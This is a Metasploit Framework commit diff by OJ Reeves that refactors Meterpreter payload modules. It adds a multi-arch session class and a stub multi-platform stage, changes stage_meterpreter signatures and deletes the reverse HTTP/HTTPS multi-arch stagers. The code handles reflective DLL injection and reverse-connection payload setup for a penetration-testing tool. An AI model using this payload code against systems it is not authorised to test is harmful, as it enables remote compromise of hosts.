Another interim commit moving towards universal handlers

bug/bundler_fix
OJ 2016-11-04 13:25:02 +10:00
parent 09d9733a75
commit b0970783ff
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
19 changed files with 161 additions and 95 deletions

View File

@ -0,0 +1,26 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-independent meterpreter session type
#
###
class Meterpreter_Multi < Msf::Sessions::Meterpreter
def initialize(rstream, opts={})
super
self.base_platform = 'unknown'
self.base_arch = ARCH_UNKNOWN
# TODO: can we read the opts and find the UUID to instantiate the right
# session type? Is it important?
end
end
end
end

View File

@ -15,14 +15,22 @@ module Msf
module Payload::Multi::ReverseHttp module Payload::Multi::ReverseHttp
include Msf::Payload::UUID::Options include Msf::Payload::UUID::Options
include Msf::Payload::Multi
# #
# Register reverse_http specific options # Register reverse_http specific options
# #
def initialize(*args) def initialize(*args)
super super
# We don't need options here at all. All options are read on the fly from the #register_advanced_options([
# JSON file when a new connection comes in. # OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
# OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10]),
# OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']),
# OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
# OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
# OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
# OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']])
# ], self.class)
end end
# #

View File

@ -66,14 +66,14 @@ module Payload::Windows::MeterpreterLoader
^ ^
end end
def stage_meterpreter(stageless=false) def stage_meterpreter(opts={})
# Exceptions will be thrown by the mixin if there are issues. # Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll')) dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))
asm_opts = { asm_opts = {
rdi_offset: offset, rdi_offset: offset,
length: dll.length, length: dll.length,
stageless: stageless stageless: opts[:stageless] == true
} }
asm = asm_invoke_metsrv(asm_opts) asm = asm_invoke_metsrv(asm_opts)

View File

@ -69,14 +69,14 @@ module Payload::Windows::MeterpreterLoader_x64
^ ^
end end
def stage_meterpreter(stageless=false) def stage_meterpreter(opts={})
# Exceptions will be thrown by the mixin if there are issues. # Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll')) dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))
asm_opts = { asm_opts = {
rdi_offset: offset, rdi_offset: offset,
length: dll.length, length: dll.length,
stageless: stageless stageless: opts[:stageless] == true
} }
asm = asm_invoke_metsrv(asm_opts) asm = asm_invoke_metsrv(asm_opts)

View File

@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {

View File

@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {

View File

@ -41,8 +41,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {

View File

@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {

View File

@ -41,8 +41,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -1,32 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_http'
require 'msf/core/payload/multi/reverse_http'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Stager
include Msf::Payload::Multi::ReverseHttp
# TODO: Add something to this that stops it from being usable from
# inside msfvenom (technically this isn't a payload)
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse HTTP Stager (multi-arch)',
'Description' => 'Tunnel communication over HTTP (multi-architecture)',
'Author' => 'OJ Reeves',
'License' => MSF_LICENSE,
'Platform' => %w{ android java linux osx php python unix win },
'Arch' => [ARCH_X86, ARCH_X64, ARCH_PYTHON, ARCH_JAVA],
'Handler' => Msf::Handler::ReverseHttp,
'Convention' => 'http'))
end
end

View File

@ -1,31 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_https'
require 'msf/core/payload/multi/reverse_https'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Stager
include Msf::Payload::Multi::ReverseHttps
# TODO: Add something to this that stops it from being usable from
# inside msfvenom (technically this isn't a payload)
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse HTTPS Stager (multi-arch)',
'Description' => 'Tunnel communication over HTTPS (multi-architecture)',
'Author' => 'OJ Reeves',
'License' => MSF_LICENSE,
'Platform' => %w{ android java linux osx php python unix win },
'Arch' => [ARCH_X86, ARCH_X64, ARCH_PYTHON, ARCH_JAVA],
'Handler' => Msf::Handler::ReverseHttps,
'Convention' => 'https'))
end
end

View File

@ -0,0 +1,89 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/base/sessions/meterpreter_multi'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
###
#
# Injects the meterpreter server DLL via the Reflective Dll Injection payload
# along with transport related configuration.
#
###
module MetasploitModule
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Architecture-Independent Meterpreter Stage',
'Description' => 'Handle Meterpreter sessions regardless of the target arch/platform',
'Author' => ['OJ Reeves'],
'PayloadCompat' => {'Convention' => ['http', 'https']},
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_Multi))
end
def stage_payload(opts={})
#return nil unless opts[:uuid]
## TODO: load the "stuff" from the JSON file?
## and if we find an instance, hydrate based on that.
## otherwise use some "sane defaults" as shown below.
#c = Class.new(::Msf::Payload)
#c.include(::Msf::Payload::Stager)
#case opts[:uuid].platform
#when 'python'
# require 'msf/core/payload/python/meterpreter_loader'
# c.include(::Msf::Payload::Python::MeterpreterLoader)
#when 'java'
# require 'msf/core/payload/java/meterpreter_loader'
# c.include(::Msf::Payload::Java::MeterpreterLoader)
#when 'php'
# require 'msf/core/payload/php/meterpreter_loader'
# c.include(::Msf::Payload::Php::MeterpreterLoader)
#when 'windows'
# require 'msf/core/payload/windows/meterpreter_loader'
# if opts[:uuid].arch == ARCH_X86
# c.include(::Msf::Payload::Windows::MeterpreterLoader)
# else
# c.include(::Msf::Payload::Windows::MeterpreterLoader_x64)
# end
#else
# return nil
#end
#second_stage = c.new()
#second_stage.stage_meterpreter(opts) + generate_config(opts)
''
end
def generate_config(opts={})
#ds = opts[:datastore] || datastore
## create the configuration block, which for staged connections is really simple.
#config_opts = {
# arch: opts[:uuid].arch,
# exitfunk: ds['EXITFUNC'],
# expiration: ds['SessionExpirationTimeout'].to_i,
# uuid: opts[:uuid],
# transports: [transport_config(opts)],
# extensions: []
#}
## create the configuration instance based off the parameters
#config = Rex::Payloads::Meterpreter::Config.new(config_opts)
## return the binary version of it
#config.to_b
''
end
end

View File

@ -33,7 +33,7 @@ module MetasploitModule
end end
def stage_payload(opts={}) def stage_payload(opts={})
stage_meterpreter + generate_config(opts) stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})

View File

@ -33,7 +33,7 @@ module MetasploitModule
end end
def stage_payload(opts={}) def stage_payload(opts={})
stage_meterpreter + generate_config(opts) stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})